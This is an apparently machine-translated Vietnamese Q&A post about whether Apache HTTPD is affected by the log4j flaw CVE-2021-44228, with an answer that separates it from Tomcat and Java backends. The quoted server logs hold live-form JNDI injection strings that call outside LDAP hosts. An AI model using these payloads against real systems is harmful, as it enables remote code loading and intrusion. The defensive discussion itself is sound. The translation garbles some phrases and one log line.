Máy chủ web Apache có sử dụng log4j (CVE-2021-44228) không?

Máy chủ web apache (apache2) có sử dụng log4j không?

Tôi đã cài đặt Apache2 2.4.38 (debian) trên Raspberry Pi OS (64bit) và tìm thấy một số bản ghi lạ trong nhật ký của tôi về CVE-2021-44228 từ kryptoslogic-cve-2021-44228.com (honeypot/máy quét), dữ liệu thống kê.com (ngoại tuyến & độc hại?) và a8fvkc.dnslog.cn (Tôi không biết đây là gì)

Tôi nên làm gì bây giờ?

• không có gì vì apache2 không bị ảnh hưởng bởi CVE-2021-44228
• định dạng mọi thứ và đợi vài ngày trước khi tôi cài đặt phiên bản vá lỗi
• "kiểm tra" nếu có bất kỳ tệp .class mới nào và nếu không tiếp tục hoạt động (và sử dụng các bản vá thủ công như log4j2.formatMsgNoLookups = TRUE
• thứ gì khác

Nhật ký:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ một}"

Bản thân Apache không được viết bằng Java và không liên kết trực tiếp với thư viện Log4j khét tiếng. Nó đặc biệt an toàn trước lỗ hổng này.

Điều gì khác có thể đi sai, sau đó?

1. Không phải mọi thứ có tên Apache và các chức năng HTTP đều chính xác các Máy chủ HTTPD Apache.Ví dụ, Apache Tomcat là máy chủ web HTTP hoàn toàn khác. Nó được viết bằng Java và có thể được cấu hình khá nhiều để sử dụng Log4J. Tôi không thực sự chắc chắn liệu có thể đăng nhập vào Tomcat hay không.

Một người có ít kinh nghiệm và kiến ​​thức hơn hoàn toàn có thể nhầm lẫn hai điều đó. Và, theo hiểu biết của tôi, Tomcat nói chung có hồ sơ theo dõi bảo mật tốt hơn so với Apache HTTPD "cổ điển".

(Theo nhận xét của Bob, cơ sở ghi nhật ký mặc định trong Tomcat không phải là Log4J.)

2. Apache HTTPD có thể mở rộng rất nhiều. Nó có thể được cấu hình để gọi những thứ khác trong nền bằng nhiều giao diện khác nhau (ví dụ: để tìm nạp các trang web động được tạo theo chương trình). Một số "thứ trong nền" này có thể dựa trên java và được liên kết với thư viện Log4J.

Số dặm của bạn có thể thay đổi, đặc biệt nếu bạn không biết chi tiết về ngăn xếp phần mềm của mình.

Để chắc chắn, trước tiên bạn nên kiểm tra xem mình có cài đặt máy Java nào không. Trong trình quản lý gói của bạn, các gói của nó sẽ được gọi là JRE-gì đó, JVM-gì đó hoặc có thể là JAVA-gì đó.

Bạn cũng có thể thử:

phiên bản java

trong vỏ của bạn.

Nếu bạn không có bất kỳ thứ nào trong số này và bạn đã không cài đặt JAVA bên ngoài trình quản lý gói của mình, thì bạn vẫn an toàn.

Nói chung là không an toàn, nhưng ít nhất là an toàn với CVE-2021-44228.